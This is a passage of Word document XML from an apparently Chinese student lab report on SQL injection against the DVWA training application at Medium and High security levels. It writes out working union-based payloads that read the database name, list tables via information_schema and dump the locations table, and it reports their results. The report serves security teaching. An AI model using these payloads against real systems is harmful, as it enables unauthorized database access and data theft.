            </w:r>
            <w:r w:rsidR="004D2613" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="003B53D9" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中的所有数据</w:t>
            </w:r>
            <w:r w:rsidR="003B53D9" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：使用的命令分别为</w:t>
            </w:r>
            <w:r w:rsidR="003B53D9" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>python3 sql_injection.py --id "1 union select 2333,database() #"</w:t>
            </w:r>
            <w:r w:rsidR="003B53D9" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 sql_injection.py --id "1 union select 2333,table_name from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>information_schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=database() #"</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 sql_injection.py --id "1 union select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(name), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(latitude, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>longtitude</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) from locations #"</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，结果分别如下</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00D3272F" w:rsidRPr="003A37DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>图所示：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1986A901" w14:textId="459F963E" w:rsidR="003A37DB" w:rsidRDefault="00674AEF" w:rsidP="003A37DB">
            <w:pPr>
              <w:ind w:left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使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174665DF" w14:textId="159BCFAC" w:rsidR="00674AEF" w:rsidRDefault="00674AEF" w:rsidP="003A37DB">
            <w:pPr>
              <w:ind w:left="420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步骤与</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别相似，此处不再赘述。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A415BCC" w14:textId="3F109F7B" w:rsidR="00D610C0" w:rsidRDefault="00D610C0" w:rsidP="00D610C0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BEE89C1" w14:textId="39F1AD81" w:rsidR="00D610C0" w:rsidRDefault="00D610C0" w:rsidP="00D610C0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ADD1B67" w14:textId="6EC721F2" w:rsidR="003D707D" w:rsidRDefault="003D707D" w:rsidP="00790F6B">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D707D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidRPr="003D707D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别的查询页面与结果显示页面不是同一个</w:t>
            </w:r>
            <w:r w:rsidR="00267722">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面</w:t>
            </w:r>
            <w:r w:rsidR="00875F1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。由于</w:t>
            </w:r>
            <w:r w:rsidR="00875F1E" w:rsidRPr="00875F1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>无法在查询页面上获取查询的结果</w:t>
            </w:r>
            <w:r w:rsidR="00875F1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，所以无法使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00875F1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00875F1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入。</w:t>
            </w:r>
            <w:r w:rsidR="002D67D7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>只能通过手工注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2606F477" w14:textId="3F972D14" w:rsidR="00790F6B" w:rsidRPr="00790F6B" w:rsidRDefault="00790F6B" w:rsidP="00790F6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bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00790F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00790F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidRPr="00790F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全级别为</w:t>
            </w:r>
            <w:r w:rsidRPr="00790F6B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1F4B41" w14:textId="232F37A8" w:rsidR="00790F6B" w:rsidRDefault="005532C7" w:rsidP="00790F6B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6582CFAA" wp14:editId="1CB2F1AF">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1713190</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>388620</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2574925" cy="1360170"/>
                  <wp:effectExtent l="0" t="0" r="3175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12-11 at 12.07.32 AM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Cs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取当前数据库名：输入</w:t>
            </w:r>
            <w:r w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1' union select 2333,database() #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，查询成功，说明当前数据库名为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648C77AC" w14:textId="7BD7E776" w:rsidR="005532C7" w:rsidRPr="005532C7" w:rsidRDefault="005532C7" w:rsidP="005532C7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs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63B3C19" wp14:editId="544AECD9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663405</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2591435" cy="1506855"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445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8-12-11 at 12.10.18 AM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35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32C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取数据库中的表：输入</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1' union select 2333,table_name from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>information_schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>table_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>' #</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，查询成功，说明</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据库中共有</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>张表：</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>guestbook</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图</w:t>
            </w:r>
            <w:r w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F4EE13" w14:textId="590C097B" w:rsidR="002B5CEA" w:rsidRPr="002B5CEA" w:rsidRDefault="002B5CEA" w:rsidP="002B5CEA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:firstLineChars="0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noProof/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F8E1C27" wp14:editId="2B172F5B">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1698625</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>2402205</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2634615" cy="1247140"/>
                  <wp:effectExtent l="0" t="0" r="0" b="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18-12-11 at 12.14.32 AM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15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2C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取表中的所有数据：简便起见以下只获取了</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中的数据，输入</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1' union select </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(name), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">(latitude,' ', </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>longtitude</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>) from locations #</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，注意此处使用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>保证</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>union</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的查询包含的列数都为</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。查询成功，说明</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>locations</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>表中共有</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005532C7" w:rsidRPr="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>条数</w:t>
            </w:r>
            <w:r w:rsidR="005532C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>据</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>元组：</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>字段分别为</w:t>
            </w:r>
            <w:r w:rsidR="0068176B" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Yi</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068176B" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fu</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068176B" w:rsidRPr="003667B4">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Building</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Guanghua</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Building</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Xianghui</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Auditorium</w:t>
            </w:r>
            <w:r w:rsidR="0068176B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C58C303" w14:textId="1045B8B7" w:rsidR="000E0AD6" w:rsidRPr="001F25A9" w:rsidRDefault="000E0AD6" w:rsidP="00735835">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E19F2D6" w14:textId="0B5AE90F" w:rsidR="003545C3" w:rsidRPr="003545C3" w:rsidRDefault="005C07C6" w:rsidP="00553298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六</w:t>
            </w:r>
            <w:r w:rsidR="003545C3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、实验总结</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C3663B7" w14:textId="76BCFFAF" w:rsidR="00312C33" w:rsidRPr="008E16D8" w:rsidRDefault="00462C80" w:rsidP="00312C33">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>通过本次实验</w:t>
            </w:r>
